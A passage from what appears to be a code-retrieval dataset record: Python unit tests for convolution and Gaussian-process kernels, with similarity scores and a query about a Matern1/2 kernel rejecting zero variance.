\"width must be > 0\")", "def test_fail(self):\r\n self.assertRaises(Exception, conv.conv2d, T.dtensor4(), T.dtensor3())\r\n self.assertRaises(Exception, conv.conv2d, T.dtensor3(), T.dvector())", "def testRateAndStrideError(self, use_bias):\n err = \"Cannot have stride > 1 with rate > 1\"\n with self.assertRaisesRegexp(snt.NotSupportedError, err):\n snt.Conv1D(output_channels=10, kernel_shape=3,\n stride=2, rate=2, name=\"conv1\", use_bias=use_bias)", "def testCreateKernel(self):\n try:\n contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)\n self.assertEqual(retErr, 0)\n # create program\n programID, retErr = PyOpenCLInterface.CreateProgram(contextID, self.testResources.programCodeStrings)\n self.assertEqual(retErr, 0)\n buildOptions = \"\"\n retErr = PyOpenCLInterface.BuildProgram(programID, self.testResources.listDevicesIDs, buildOptions)\n self.assertEqual(retErr, 0)\n #create kernel\n kernelName = self.testResources.KernelFunctionName\n kernelID, retErr = PyOpenCLInterface.CreateKernel(programID, kernelName)\n self.assertEqual(retErr, 0)\n kernelProperties, retErr = PyOpenCLInterface.GetKernelProperties(kernelID)\n self.assertEqual(kernelProperties['Program'], programID)\n self.assertEqual(kernelProperties['id'], kernelID)\n self.assertEqual(kernelProperties['Context'], contextID)\n self.assertEqual(kernelProperties['KernelFunctionName'], kernelName)\n retErr = PyOpenCLInterface.ReleaseKernel(kernelID)\n self.assertEqual(retErr, 0)\n retErr = PyOpenCLInterface.ReleaseProgram(programID)\n self.assertEqual(retErr, 0)\n listPrograms = PyOpenCLInterface.ListPrograms()\n self.assertEqual(listPrograms, [])\n retErr = PyOpenCLInterface.ReleaseContext(contextID)\n self.assertEqual(retErr, 0)\n except:\n print \"Exception caught:\", sys.exc_info()[0]", "def test_GPLVM_rbf_linear_white_kern_2D(self):\r\n N, input_dim, D = 50, 1, 2\r\n X = np.random.rand(N, input_dim)\r\n k = GPy.kern.linear(input_dim) + GPy.kern.bias(input_dim, 0.1) + GPy.kern.white(input_dim, 0.05)\r\n K = k.K(X)\r\n Y = np.random.multivariate_normal(np.zeros(N), K, input_dim).T\r\n m = GPy.models.GPLVM(Y, input_dim, init='PCA', kernel=k)\r\n self.assertTrue(m.checkgrad())", "def test_zero(self):\n controller = LinearController(self.G, 2, mode='zero')\n sim = simulation.Simulation(self.G, controller, dt=self.dt)\n sim.run(self.dt)\n\n self.assertAlmostEqual(np.linalg.norm(controller.W.ravel()), 0.0)\n self.assertAlmostEqual(np.linalg.norm(controller.out), 0.0)", "def kernel_factory(s, m1, m2):\r\n m_max = max(m1, m2)\r\n A = np.zeros([s, m_max, m_max], dtype=complex)\r\n symmetry = random.choice([2, 3, 4, 6])\r\n half_sym = np.floor(symmetry / 2).astype('int')\r\n lowest_k = 0.5\r\n highest_k = 3\r\n k = np.zeros([s, symmetry])\r\n for level in range(s):\r\n k[level, :] = np.random.uniform(lowest_k, highest_k, symmetry)\r\n\r\n x, y = np.meshgrid(np.linspace(-1, 1, m_max), np.linspace(-1, 1, m_max))\r\n # dist = np.sqrt(x * x + y * y)\r\n # theta = np.arctan(x / y)\r\n arb_angle = np.random.uniform(0, 2 * np.pi)\r\n for direction in range(symmetry):\r\n ang = direction * 180 / symmetry\r\n ang = arb_angle + ang * np.pi / 180\r\n r = (x * np.cos(ang) + np.sin(ang) * y)\r\n phi = np.random.uniform(0, 2 * np.pi)\r\n for i in range(s):\r\n A[i, :, :] += np.cos(2 * np.pi * k[i, direction % half_sym] * r)\r\n\r\n # Adding normal decay\r\n sigma = np.random.uniform(0.3, 0.6)\r\n decay = gaussian_window(m_max, m_max, sigma)\r\n A = np.multiply(np.abs(A), decay)\r\n # Normalizing:\r\n A = sphere_norm_by_layer(A)\r\n return A" ]
[ "0.6572343", "0.6536193", "0.63661206", "0.6360225", "0.6295031", "0.6194598", "0.6051746", "0.5993452", "0.59858924", "0.59765357", "0.59129274", "0.5900474", "0.5889973", "0.58620816", "0.5820467", "0.58139074", "0.5799146", "0.5781969", "0.57249826", "0.57009274", "0.5688538", "0.5544956", "0.5544956", "0.5529479", "0.55000484", "0.54913867", "0.5491348", "0.54885775", "0.54483104", "0.544471", "0.5443903", "0.5437116", "0.54360473", "0.5414028", "0.541142", "0.5407814", "0.539949", "0.5389693", "0.5384821", "0.5382084", "0.53756857", "0.53756624", "0.5373655", "0.5373655", "0.5363447", "0.53514314", "0.533298", "0.5330851", "0.53145283", "0.531385", "0.5309701", "0.5303267", "0.5301944", "0.53003824", "0.52995956", "0.5290957", "0.5281488", "0.52774996", "0.52727336", "0.5250242", "0.5245496", "0.5241908", "0.5225722", "0.52250576", "0.52228576", "0.5199133", "0.51875085", "0.5186054", "0.51850694", "0.5179355", "0.5169157", "0.51663846", "0.5164515", "0.5154694", "0.5152666", "0.51522774", "0.51485693", "0.5143524", "0.5142764", "0.5142764", "0.5139899", "0.5135237", "0.5134256", "0.5132573", "0.51309055", "0.51303464", "0.51293534", "0.51241887", "0.51232314", "0.51229715", "0.5122795", "0.5117027", "0.51149416", "0.51110715", "0.5104154", "0.5099612", "0.50988656", "0.5096506", "0.5096425", "0.50949764" ]
0.6592899
0
Test that initializing a Matern1/2 kernel with 0 variance raises an exception
def test_matern12_zero_variance(matern): with pytest.raises(ValueError) as exp: matern(lengthscale=1.0, variance=0.0, output_dim=1) assert exp.value.args[0].find("variance must be positive.") >= 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_gauss_kernel():\n\n gauss = gauss_kernel(2, 5)\n\n assert gauss.shape == (5, 5)\n assert gauss[2, 2] == 0.039788735772973836", "def test_nonpositive_nu_raises_exception(nu):\n with pytest.raises(ValueError):\n kernels.Matern(input_dim=1, nu=nu)", "def testKernelsNotSpecified(self):\n with self.assertRaisesRegexp(ValueError, \"`kernel_shape` cannot be None.\"):\n snt.Conv1DTranspose(output_channels=1)", "def testKernelsNotSpecified(self):\n with self.assertRaisesRegexp(ValueError, \"`kernel_shape` cannot be None.\"):\n snt.Conv2DTranspose(output_channels=1)", "def testKernelShape(self, use_bias):\n\n snt.Conv1D(output_channels=10, kernel_shape=[3], name=\"conv1\",\n use_bias=use_bias)\n snt.Conv1D(output_channels=10, kernel_shape=3, name=\"conv1\",\n use_bias=use_bias)\n\n err = \"Invalid kernel shape\"\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv1D(output_channels=10, kernel_shape=[3, 3], name=\"conv1\")", "def testKernelShape(self, use_bias):\n\n snt.Conv2D(output_channels=10, kernel_shape=[3, 4], name=\"conv1\",\n use_bias=use_bias)\n snt.Conv2D(output_channels=10, kernel_shape=3, name=\"conv1\",\n use_bias=use_bias)\n\n err = \"Invalid kernel shape\"\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv2D(output_channels=10,\n kernel_shape=[3, 3, 3],\n name=\"conv1\")", "def testBiasInitializerIsZeroByDefault(self):\n\n conv1 = snt.Conv3D(\n output_channels=5,\n kernel_shape=3,\n stride=1)\n\n conv1(tf.placeholder(tf.float32, [5, 10, 10, 10, 7]))\n\n with self.test_session():\n tf.variables_initializer([conv1.w, conv1.b]).run()\n\n self.assertAllClose(\n conv1.b.eval(),\n np.zeros([5], dtype=np.float32))", "def testNoFeatureColumnsOrKernelMappers(self):\n with self.assertRaises(ValueError):\n _ = kernel_estimators.KernelLinearClassifier()", "def testKernelShape(self, use_bias):\n\n # No check against output_channels is done yet (needs input size).\n snt.SeparableConv1D(\n output_channels=1,\n channel_multiplier=2,\n kernel_shape=[3],\n name=\"conv1\",\n use_bias=use_bias)\n snt.SeparableConv1D(\n output_channels=1, channel_multiplier=1, kernel_shape=3, name=\"conv1\")\n\n error_msg = (r\"Invalid kernel shape: x is \\[3, 3\\], must be either a \"\n r\"positive integer or an iterable of positive integers of \"\n r\"size 1\")\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, error_msg):\n snt.SeparableConv1D(output_channels=1,\n channel_multiplier=3,\n kernel_shape=[3, 3],\n use_bias=use_bias)", "def testVariablesWithAndWithoutKernels(self):\n multi_dim_feature = layers.real_valued_column(\n 'multi_dim_feature', dimension=2)\n\n linear_classifier = kernel_estimators.KernelLinearClassifier(\n feature_columns=[multi_dim_feature])\n linear_classifier.fit(\n input_fn=_linearly_inseparable_binary_input_fn, steps=50)\n linear_variables = linear_classifier.get_variable_names()\n self.assertIn('linear/multi_dim_feature/weight', linear_variables)\n self.assertIn('linear/bias_weight', linear_variables)\n linear_weights = linear_classifier.get_variable_value(\n 'linear/multi_dim_feature/weight')\n linear_bias = linear_classifier.get_variable_value('linear/bias_weight')\n\n kernel_mappers = {\n multi_dim_feature: [RandomFourierFeatureMapper(2, 30, 0.6, 1, 'rffm')]\n }\n kernel_linear_classifier = kernel_estimators.KernelLinearClassifier(\n feature_columns=[], kernel_mappers=kernel_mappers)\n kernel_linear_classifier.fit(\n input_fn=_linearly_inseparable_binary_input_fn, steps=50)\n kernel_linear_variables = kernel_linear_classifier.get_variable_names()\n self.assertIn('linear/multi_dim_feature_MAPPED/weight',\n kernel_linear_variables)\n self.assertIn('linear/bias_weight', kernel_linear_variables)\n kernel_linear_weights = kernel_linear_classifier.get_variable_value(\n 'linear/multi_dim_feature_MAPPED/weight')\n kernel_linear_bias = kernel_linear_classifier.get_variable_value(\n 'linear/bias_weight')\n\n # The feature column used for linear classification (no kernels) has\n # dimension 2 so the model will learn a 2-dimension weights vector (and a\n # scalar for the bias). In the kernelized model, the features are mapped to\n # a 30-dimensional feature space and so the weights variable will also have\n # dimension 30.\n self.assertEqual(2, len(linear_weights))\n self.assertEqual(1, len(linear_bias))\n self.assertEqual(30, len(kernel_linear_weights))\n self.assertEqual(1, len(kernel_linear_bias))", "def testKernelShape(self, use_bias):\n\n # No check against output_channels is done yet (needs input size).\n snt.SeparableConv2D(\n output_channels=1,\n channel_multiplier=2,\n kernel_shape=[3, 4],\n name=\"conv1\",\n use_bias=use_bias)\n snt.SeparableConv2D(\n output_channels=1, channel_multiplier=1, kernel_shape=3, name=\"conv1\")\n\n error_msg = (r\"Invalid kernel shape: x is \\[3], must be either a positive\"\n r\" integer or an iterable of positive integers of size 2\")\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, error_msg):\n snt.SeparableConv2D(output_channels=1,\n channel_multiplier=3,\n kernel_shape=[3],\n use_bias=use_bias)", "def testKernelShape(self):\n\n snt.Conv3D(output_channels=10, kernel_shape=[3, 4, 5], name=\"conv1\")\n snt.Conv3D(output_channels=10, kernel_shape=3, name=\"conv1\")\n\n with self.assertRaisesRegexp(snt.Error, \"Invalid kernel shape.*\"):\n snt.Conv3D(output_channels=10, kernel_shape=[3, 3], name=\"conv1\")\n snt.Conv3D(output_channels=10, kernel_shape=[3, 3, 3, 3], name=\"conv1\")", "def testKernelShape(self, use_bias):\n\n snt.DepthwiseConv2D(channel_multiplier=1, kernel_shape=[3, 4])\n snt.DepthwiseConv2D(channel_multiplier=1, kernel_shape=3)\n error_msg = (r\"Invalid kernel shape: x is \\[3], must be either a positive\"\n r\" integer or an iterable of positive integers of size 2\")\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, error_msg):\n snt.DepthwiseConv2D(channel_multiplier=1, kernel_shape=[3],\n use_bias=use_bias, name=\"conv1\")", "def testZeroInput(self):\n self.assertRaises(TypeError, nb.rscale,)", "def test_kernel_matrix(kernel, sample):\n sample = [ele for ele in sample] # consumed several times\n\n potato = KernelMethod(kernel)\n mat = potato.matrix(sample)\n assert np.all(np.linalg.eigvals(mat) > 0) or np.isclose(\n [np.min(np.linalg.eigvals(mat))], [0]\n )", "def test_param_cov_with_uncertainties(self, fitter):\n fitter = fitter()\n\n a = 2\n b = 100\n\n with NumpyRNGContext(_RANDOM_SEED):\n x = np.linspace(0, 1, 100)\n # y scatter is amplitude ~1 to make sure covariance is\n # non-negligible\n y = x * a + b + np.random.normal(size=len(x))\n sigma = np.random.normal(loc=1, scale=0.1, size=len(x))\n\n # compute the ordinary least squares covariance matrix\n # accounting for measurement uncertainties `sigma`\n X = np.vstack([x, np.ones(len(x))]).T\n inv_N = np.linalg.inv(np.diag(sigma) ** 2)\n cov = np.linalg.inv(X.T @ inv_N @ X)\n beta = cov @ X.T @ inv_N @ y.T\n\n # now do the non-linear least squares fit\n mod = models.Linear1D(a, b)\n\n with pytest.warns(AstropyUserWarning, match=r\"Model is linear in parameters\"):\n fmod = fitter(mod, x, y, weights=sigma**-1)\n\n assert_allclose(fmod.parameters, beta.ravel())\n assert_allclose(cov, fitter.fit_info[\"param_cov\"])", "def init_kernel(cls, m):\n pass", "def __init__(self, N0, N1):\n #self.w = np.zeros(N);\n self.p0 = N0/(N0+N1) \n self.p1 = N1/(N0+N1)\n self.mu0 = np.zeros(N0+N1)\n self.mu1 = np.zeros(N0+N1)\n self.covariance = 0", "def white(input_dim,variance=1.):\r\n part = parts.white.White(input_dim,variance)\r\n return kern(input_dim, [part])", "def test_calculate_variance_covariance_zero_division_shape(self):\n\n _var_covar = calculate_variance_covariance(22, 620.0, 0.4239, 0.0)\n self.assertAlmostEqual(_var_covar[0][0], 0.006105992)\n self.assertAlmostEqual(_var_covar[0][1], 0.03925982)\n self.assertAlmostEqual(_var_covar[1][0], 0.03925982)\n self.assertAlmostEqual(_var_covar[1][1], -0.7475704)", "def testBiasInitializerIsZeroByDefault(self):\n\n conv1 = snt.Conv3DTranspose(\n output_channels=7,\n kernel_shape=3,\n stride=1)\n\n conv1(tf.placeholder(tf.float32, [7, 10, 10, 10, 5]))\n\n with self.test_session():\n tf.variables_initializer([conv1.w, conv1.b]).run()\n\n self.assertAllClose(\n conv1.b.eval(),\n np.zeros([7], dtype=np.float32))", "def test_low_variance(self):\n # Cycle through various initializations\n initializations = ['random', 'pca']\n allowed = 1e-3\n\n for init in initializations:\n tsne = TSNE(initialization=init, perplexity=2)\n embedding = tsne.prepare_initial(self.x)\n np.testing.assert_array_less(np.var(embedding, axis=0), allowed,\n 'using the `%s` initialization' % init)", "def normal_init(m, mean, std):\n if isinstance(m, nn.ConvTranspose2d) or isinstance(m, nn.Conv2d):\n m.weight.data.normal_(mean, std)\n m.bias.data.zero_()", "def abe(img,variance):\n nominator = img**2-3*variance\n nominator[nominator<0] = 0\n out = np.divide(nominator,img)\n out[img==0]=0\n return out", "def test_fixedkernel(self):\r\n X = np.random.rand(30, 4)\r\n K = np.dot(X, X.T)\r\n kernel = GPy.kern.fixed(4, K)\r\n kern = GPy.kern.poly(5, degree=4)\r\n self.assertTrue(GPy.kern.kern_test(kern, verbose=verbose))", "def testInitializers(self, use_bias):\n\n w_dw = random.random()\n w_pw = random.random()\n b = np.random.randn(6) # Kernel shape is 3, input channels are 2, 2*3 = 6.\n conv1 = snt.SeparableConv2D(\n output_channels=6,\n channel_multiplier=3,\n kernel_shape=3,\n use_bias=use_bias,\n initializers=create_separable_constant_initializers(\n w_dw, w_pw, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w_dw, conv1.w_pw, conv1.b] if use_bias else\n [conv1.w_dw, conv1.w_pw]).run()\n\n self.assertAllClose(\n conv1.w_dw.eval(), np.full(\n [3, 3, 2, 3], w_dw, dtype=np.float32))\n self.assertAllClose(\n conv1.w_pw.eval(), np.full(\n [1, 1, 6, 6], w_pw, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(conv1.b.eval(), b)\n\n error_msg = \"Initializer for 'w_dw' is not a callable function\"\n with self.assertRaisesRegexp(TypeError, error_msg):\n snt.SeparableConv2D(\n output_channels=3,\n channel_multiplier=1,\n kernel_shape=3,\n stride=1,\n use_bias=use_bias,\n initializers={\"w_dw\": tf.ones([])})", "def __init__(self, kernel_parameter: Union[int, float] = 1, nu=1.5):\n super().__init__(kernel_parameter)\n self.nu = nu", "def test_calculate_variance_covariance_zero_division_scale(self):\n\n _var_covar = calculate_variance_covariance(22, 620.0, 0.0, 0.6142)\n self.assertAlmostEqual(_var_covar[0][0], -0.0005236216)\n self.assertAlmostEqual(_var_covar[0][1], 0.002995667)\n self.assertAlmostEqual(_var_covar[1][0], 0.002995667)\n self.assertAlmostEqual(_var_covar[1][1], 8.9787221E-06)", "def initialize_(self, kernel, bias=None):\n dtype = self.body[0].weight.dtype\n device = self.body[0].weight.device\n kernel = torch.tensor(kernel, dtype=dtype, device=device, requires_grad=True)\n assert kernel.shape == self.body[0].weight.shape, 'Wrong kernel shape!'\n if bias is not None:\n bias = torch.tensor(bias, dtype=dtype, device=device, requires_grad=True)\n assert bias.shape == self.body[0].bias.shape, 'Wrong bias shape!'\n self.body[0].weight.data.copy_(kernel)\n self.body[0].bias.data.copy_(bias)", "def test_cvae_init(self):\n torch.manual_seed(0)\n cvae = VAE(\n in_dim=20,\n nb_classes=2,\n latent_dim=16,\n p_dropout=0.1,\n hidden_dims=[64, 32])\n rng = np.random.default_rng(seed=0)\n x = torch.tensor(rng.random(size=(10, 20))).float()\n rng = np.random.default_rng(seed=0)\n y = rng.integers(low=0, high=2, size=10)\n y_onehot = one_hot(y, nb_classes=2)\n y_onehot = torch.tensor(y_onehot).float()\n [x_hat, _, _, _] = cvae(x, y_onehot, 0)\n x_hat_mean = torch.mean(x_hat).detach().numpy()\n self.assertAlmostEqual(x_hat_mean, -0.0245, 4)", "def testInvalidKernelMapper(self):\n\n class DummyKernelMapper(object):\n\n def __init__(self):\n pass\n\n feature = layers.real_valued_column('feature')\n kernel_mappers = {feature: [DummyKernelMapper()]}\n with self.assertRaises(ValueError):\n _ = kernel_estimators.KernelLinearClassifier(\n feature_columns=[feature], kernel_mappers=kernel_mappers)", "def testInitializers(self, use_bias):\n\n w_dw = random.random()\n w_pw = random.random()\n b = np.random.randn(6) # Kernel shape is 3, input channels are 2, 2*3 = 6.\n conv1 = snt.SeparableConv1D(\n output_channels=6,\n channel_multiplier=3,\n kernel_shape=3,\n use_bias=use_bias,\n initializers=create_separable_constant_initializers(\n w_dw, w_pw, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w_dw, conv1.w_pw, conv1.b] if use_bias else\n [conv1.w_dw, conv1.w_pw]).run()\n\n self.assertAllClose(\n conv1.w_dw.eval(), np.full(\n [1, 3, 2, 3], w_dw, dtype=np.float32))\n self.assertAllClose(\n conv1.w_pw.eval(), np.full(\n [1, 1, 6, 6], w_pw, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(conv1.b.eval(), b)\n\n error_msg = \"Initializer for 'w_dw' is not a callable function\"\n with self.assertRaisesRegexp(TypeError, error_msg):\n snt.SeparableConv1D(\n output_channels=3,\n channel_multiplier=1,\n kernel_shape=3,\n stride=1,\n use_bias=use_bias,\n initializers={\"w_dw\": tf.ones([])})", "def test_5_scalar_variance_1step(self):\n print(\"test 5 comparing variances\")\n\n means, vars, cl_probs = EM_step(\n self.X_h, self.means_h, self.dispersions_h, self.cluster_probabilities_h\n )\n\n self.assertEqual(means.shape[0], 2)\n\n print(vars[0], vars[1])", "def _WeightInit(self, stddev):\n return init_ops.truncated_normal_initializer(stddev=stddev)", "def test_null_bootstrapping(self):\n\n apply = lambda p, x, i: x[:, :1]\n output = apply(self._params, self._batch.x, self._index)\n # y is zero, hence the loss is just the mean square of the output.\n expected_loss = np.mean(np.square(output))\n\n loss_fn = single_index.L2Loss()\n loss, unused_metrics = loss_fn(\n apply=apply, params=self._params, batch=self._batch, index=self._index)\n self.assertEqual(\n loss, expected_loss,\n (f'expected loss with null bootstrapping is {expected_loss}, '\n f'but it is {loss}'))", "def kernel_sigma(n_kernels):\n sigmas = [0.001] # exact match small variance means exact match ?\n if n_kernels == 1:\n return sigmas\n return sigmas + [0.1] * (n_kernels - 1)", "def test_variance(self):\n self.assertEqual(variance(list1, sample=False), np.var(list1))\n self.assertEqual(variance(list1), np.var(list1, ddof=1))", "def testMask1D(self):\n mask = np.ones((3,), dtype=np.float32)\n inputs = tf.constant(1.0, shape=(1, 5, 5, 2))\n conv1 = snt.Conv2D(\n output_channels=1,\n kernel_shape=3,\n mask=mask,\n padding=snt.VALID,\n use_bias=False,\n initializers=create_constant_initializers(1.0, 0.0, use_bias=False))\n out = conv1(inputs)\n expected_out = 18 * np.ones((1, 3, 3, 1))\n with self.test_session():\n tf.variables_initializer([conv1.w]).run()\n self.assertAllClose(out.eval(), expected_out)", "def testInitializers(self, use_bias):\n w = random.random()\n b = np.random.randn(6) # Kernel shape is 3, input channels are 2, 2*3 = 6\n\n conv1 = snt.DepthwiseConv2D(\n channel_multiplier=3,\n kernel_shape=3,\n stride=1,\n use_bias=use_bias,\n initializers=create_constant_initializers(w, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w, conv1.b] if use_bias else [conv1.w]).run()\n\n self.assertAllClose(\n conv1.w.eval(), np.full(\n [3, 3, 2, 3], w, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(conv1.b.eval(), b)\n\n error_msg = \"Initializer for 'w' is not a callable function\"\n with self.assertRaisesRegexp(TypeError, error_msg):\n snt.DepthwiseConv2D(\n channel_multiplier=3,\n kernel_shape=3,\n stride=1,\n use_bias=use_bias,\n initializers={\"w\": tf.ones([])})", "def _initialize_kernel(input_dim: int,\n kernel: str = 'RBF',\n use_single_gp: bool = False) -> GenericKernel:\n if kernel == 'RBF':\n return RBFKernel(input_dim, use_single_gp)\n elif kernel == 'Matern52':\n return Matern52Kernel(input_dim, use_single_gp)\n elif kernel == 'Matern32':\n return Matern32Kernel(input_dim, use_single_gp)\n elif kernel == 'RationalQuadratic':\n return RationalQuadraticKernel(\n input_dim=input_dim, use_single_gp=use_single_gp)\n elif kernel == 'Sigmoid':\n return SigmoidKernel(input_dim, use_single_gp)\n else:\n sys.exit(\"Error: specified Gaussian Process kernel not valid\")", "def eg3(N_train=1000, N_test=500, depend_ratio_train=0.8, depend_ratio_test=0.2, feature_num=10, stable_ratio=0.4):\n\n def eg3_kernel(n, p, stable_ratio=0.4, depend_ratio=0.8):\n p_stable = int(p * stable_ratio)\n p_noise = p - p_stable\n stable_feature = np.random.randn(n, p_stable)\n noise_feature_dependent = np.zeros([n, p_noise])\n noise_feature_independent = np.random.randn(n, p_noise)\n for i in range(p_noise):\n noise_feature_dependent[:, i] = stable_feature[:, i % p_stable] + stable_feature[:,\n (i + 1) % p_stable] + 2 * np.random.randn(\n n) # still need noise\n noise_depend_label = np.random.uniform(0, 1, n).reshape(-1, 1)\n noise_depend_label = np.concatenate([noise_depend_label] * p_noise, axis=1)\n noise_feature = np.where(noise_depend_label < depend_ratio, noise_feature_dependent, noise_feature_independent)\n\n b = np.zeros([p_stable, 1])\n linear_len = int(p_stable / 2)\n\n for i in range(linear_len): # linear part\n b[i, 0] = (-1) ** i * (i % 3 + 1) * p / 3\n for i in range(linear_len, b.shape[0]): # nonlinear part\n b[i, 0] = p / 2\n\n linear_part = np.matmul(stable_feature[:, :linear_len], b[:linear_len, 0])\n nolinear_part = np.zeros([n, 1])\n for i in range(linear_len, b.shape[0]):\n temp = stable_feature[:, i % p_stable] * stable_feature[:, (i + 1) % p_stable] * b[i, 0]\n temp = temp.reshape(-1, 1)\n nolinear_part += temp\n\n Y = linear_part.reshape(-1, 1) + nolinear_part + np.random.randn(n, 1)\n\n data = {}\n data['stable'] = stable_feature\n data['noise'] = noise_feature\n data['Y'] = Y\n data['params'] = b\n data['kernel'] = 'eg3'\n return data\n\n data_train = eg3_kernel(n=N_train, p=feature_num, stable_ratio=stable_ratio, depend_ratio=depend_ratio_train)\n data_test = eg3_kernel(n=N_test, p=feature_num, stable_ratio=stable_ratio, depend_ratio=depend_ratio_test)\n return data_train, data_test", "def test_variance_of_stokes_linear_synthetic():\n var_slope = 0.01\n\n nx = 500\n x = np.linspace(0.0, 20.0, nx)\n\n nt = 200\n G = np.linspace(500, 4000, nt)[None]\n c_no_noise = G * np.exp(-0.001 * x[:, None])\n\n c_lin_var_through_zero = stats.norm.rvs(\n loc=c_no_noise,\n # size=y.size,\n scale=(var_slope * c_no_noise) ** 0.5,\n )\n ds = DataStore(\n {\n \"st\": ([\"x\", \"time\"], c_no_noise),\n \"c_lin_var_through_zero\": ([\"x\", \"time\"], c_lin_var_through_zero),\n \"probe1Temperature\": ([\"time\"], range(nt)),\n \"userAcquisitionTimeFW\": ([\"time\"], np.ones(nt)),\n },\n coords={\"x\": x, \"time\": range(nt)},\n attrs={\"isDoubleEnded\": \"0\"},\n )\n\n sections = {\"probe1Temperature\": [slice(0.0, 20.0)]}\n test_st_var, _ = ds.variance_stokes(st_label=\"st\", sections=sections)\n\n # If fit is forced through zero. Only Poisson distributed noise\n (\n slope,\n offset,\n st_sort_mean,\n st_sort_var,\n resid,\n var_fun,\n ) = ds.variance_stokes_linear(\n \"c_lin_var_through_zero\",\n sections=sections,\n nbin=10,\n through_zero=True,\n plot_fit=False,\n )\n assert_almost_equal_verbose(slope, var_slope, decimal=3)\n\n # Fit accounts for Poisson noise plus white noise\n (\n slope,\n offset,\n st_sort_mean,\n st_sort_var,\n resid,\n var_fun,\n ) = ds.variance_stokes_linear(\n \"c_lin_var_through_zero\", sections=sections, nbin=100, through_zero=False\n )\n assert_almost_equal_verbose(slope, var_slope, decimal=3)\n assert_almost_equal_verbose(offset, 0.0, decimal=0)\n\n pass", "def test_init_variants():\n # get data\n X, _, _, _ = get_data()\n # set seed and kernel initialisers for repeatability\n tf.random.set_seed(12345)\n initializer = tf.keras.initializers.Zeros()\n\n # define model architecture\n input_data = Input(shape=X[0].shape)\n xx = Dense(32, activation=\"relu\", kernel_initializer=initializer)(input_data)\n output = Dense(n_classes, activation=\"softmax\", kernel_initializer=initializer)(xx)\n\n # standard way\n model = SafeKerasModel(\n inputs=input_data,\n outputs=output,\n name=\"test\",\n num_samples=X.shape[0],\n epochs=EPOCHS,\n )\n check_init_completed(model)\n\n # inputs and outputs not in kwargs\n model2 = SafeKerasModel(\n input_data,\n output,\n \"test\",\n num_samples=X.shape[0],\n epochs=EPOCHS,\n )\n check_init_completed(model2)\n\n # batch size zero\n model3 = SafeKerasModel(\n inputs=input_data,\n outputs=output,\n name=\"test\",\n num_samples=X.shape[0],\n epochs=EPOCHS,\n batch_size=0,\n )\n errstr = \"failed to correct batch_size=0 in init\"\n assert model3.batch_size == 32, errstr", "def test_xavier_normal():\n tf.reset_default_graph()\n tf.random.set_random_seed(0)\n xnormal_class = INITIALIZER_REGISTRY['xavier']\n xnormal_obj = xnormal_class({\"uniform\":False})\n tf_init = xnormal_obj.get_entity_initializer(init_type='tf')\n var1 = tf.get_variable(shape=(2000, 100), initializer=tf_init, name=\"var1\")\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n tf_var = sess.run(var1)\n np_var = xnormal_obj.get_entity_initializer(2000, 100, init_type='np')\n # print(np.mean(np_var), np.std(np_var))\n # print(np.mean(tf_var), np.std(tf_var))\n assert(np.round(np.mean(np_var),2)==np.round(np.mean(tf_var),2))\n assert(np.round(np.std(np_var),2)==np.round(np.std(tf_var),2))", "def testMaskErrorIncompatibleRank2(self):\n\n np_mask = np.ones((3, 3))\n x = tf.constant(0.0, shape=(2, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv1D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def kernel_test(slabs, data, backend):\n Q = data[:, 0]\n\n layers = []\n for thickness, rsld, isld, sigma in slabs:\n layers.append(\n model.Layer(\n b=(rsld - 1j * isld), dens=0.1, d=thickness, sigma=sigma\n )\n )\n layers.reverse()\n stack = model.Stack(Layers=list(layers[1:-1]), Repetitions=1)\n sample = model.Sample(\n Stacks=[stack], Ambient=layers[-1], Substrate=layers[0]\n )\n # print(sample)\n\n inst = model.Instrument(\n probe=backend,\n wavelength=1.54,\n coords=\"q\",\n I0=1,\n res=0,\n restype=\"no conv\",\n respoints=5,\n resintrange=2,\n beamw=0.1,\n footype=\"no corr\",\n samplelen=10,\n pol=\"uu\",\n )\n if data.shape[1] == 4:\n dQ = data[:, 3]\n inst.restype = \"full conv and varying res.\"\n inst.res = dQ\n if backend == \"neutron pol spin flip\":\n # memory issues in matrix formalism if too many data points\n inst.respoints = 101\n else:\n inst.respoints = (\n 10001 # try to use same convolution as ref1d when generating\n )\n inst.resintrange = 3.5\n\n # print(inst)\n R = sample.SimSpecular(Q, inst)\n\n assert R.shape == data[:, 1].shape\n if data.shape[1] == 4:\n # validation accuracy is reduced for resolution runs, as strongly\n # depends on numerical convolution scheme\n if backend == \"neutron pol spin flip\":\n np.testing.assert_allclose(R, data[:, 1], rtol=0.005)\n else:\n np.testing.assert_allclose(R, data[:, 1], rtol=0.001)\n else:\n np.testing.assert_allclose(R, data[:, 1], rtol=0.001)", "def test_unroll_kern(self):\r\n # 6 filters is a multiple of 2 and 3. Should work.\r\n self.validate((2, 3, 3, 3), (6, 3, 2, 2), 'valid', unroll_kern=2,\r\n verify_grad=False)\r\n self.validate((2, 3, 3, 3), (6, 3, 2, 2), 'valid', unroll_kern=3,\r\n verify_grad=False)", "def testZeroInput(self):\n nb.rescale_length(2.0)\n nb.rescale_length(0)\n self.assertEqual(2.0, nb.rscale)", "def test_fit(self):\n X = np.zeros((2, 3), dtype=np.float64)\n snv = SNV(q=50)\n try:\n _ = snv.fit(X)\n except:\n self.assertTrue(False)", "def testShapesNotKnown(self, 